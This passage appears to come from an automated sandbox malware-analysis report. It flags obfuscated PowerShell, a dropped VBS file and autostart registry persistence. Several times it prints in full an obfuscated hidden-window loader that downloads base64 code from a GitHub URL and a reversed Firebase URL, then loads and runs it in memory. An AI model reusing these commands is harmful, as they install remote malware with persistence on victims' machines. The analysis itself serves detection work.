?sCA4AANA0FASBQYAgGADBwWAsCA2AgNA0FASBQYAgGADBwWAgCAgAAIAUGAjBQQAwGAQBQZA? ? ? ? ?IFAtAAIAACA5AwMA0"; marrasquino += "FASBQYAgGADBwWAwCApAwMAcDAdBgUAEGAoBwQAsFArAQNAUDAdB? ? ? ? ?gUAEGAoBwQAsFArAwNAYDAdBgUAEGAoBwQAsFA? ? ? ? ?oAAIAACAlBwQAEGAMBAcAUGA? ? ? ? ?yBwQA0CAgAAIAQDAzAQXAIFAhBAaAMEAbBALAkCA1AAOA0FASBQYAgGADBwWAsCAxAAOA0FASBQYAgGADBwWAsCAyAQMAEDAdBgUAEGAoBwQAsFAoAAIAUGADBQYAwEAwBQZAIHADBQLAACAgAQKAcCApAQVAEFAnAwKAcCAwBwJAsCAnAQVAEFAnAwKAcCAwBALAUFARBA? ? ? ? ?cAUFAnAwKAcCARBAcAACAsAQVAEFAwBwJAsCAnAgMAcCArAwJAMDAzBwcAUGAjBwbAcCArAw? ? ? ? ?JAIHAQBgbAkEAkBAZ"; marrasquino += "AEEAVBQUAAHAgAALAUFARBwJAsCAnAAcAEGAmBwJAsCAnAQaAQHA? ? ? ? ?hBwYAwGAnAwKAcCAhBQVAEFAnAwKAcCAwBAIAw? ? ? ? ?CAVBQUAAHAnAwKAcCA5BwJAs? ? ? ? ?CAnAANAQFAnAwKAcCAhBAdAEGAEBQbAEGAyBwZA8GAyBAUAkHA0AwJAsCAnAAVAoDADBQVAEFAwBAIAcCArAwJAwCAVBQUAAHAxAQVAEFAwBAIAcCArAwJAwCAVBQUAAHAoBAdAcCArAwJAQHAwBwJAsCAnAwcAcCArAwJAoDAvAwLAcCArAwJAYGApBgcAUGAnAwKAcCAi? ? ? ? ?BQYAMHAlBwcAcCArAwJAQHAnAwKAcCAvBgcAEGAnBwJAsCAnAQZA4CAnAwKAcCAnBwbA8GAn? ? ? ? ?AwKAcCAnBAbAUGAhB"; marrasquino += "AcAkGAzBwJAsCAnAgLAcCArAwJAMGAvBQbA8CAnAwKAcCA2BAMA8? ? ? ? ?CAiBwLAcCArAwJAMGAnAwKAcCAyBQeAAHA0BwJ? ? ? ? ?AsCAnAwcAIDAwAgMAQDAuAQY?
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAWwBDAGgAYQBSAF0ANAA4ACsAWwBDAGgAYQBSAF0ANQA2ACkALABbAEMAaABhAFIAXQAzADYAIAAgAC0AUgBlA
                  Obfuscated command line found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAG
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC388156 push esp; iretd 11_2_00007FFAAC38815C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC387567 push ebx; iretd 11_2_00007FFAAC38756A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC387820 push eax; iretd 11_2_00007FFAAC38786D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC387850 push eax; iretd 11_2_00007FFAAC38786D

                  Persistence and Installation Behavior

                  barindex
                  Command shell drops VBS files
                  Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\alcatifa.vbsJump to behavior

                  Boot Survival

                  barindex
                  Creates autostart registry keys with suspicious values (likely registry only malware)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alcatifa.vbsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
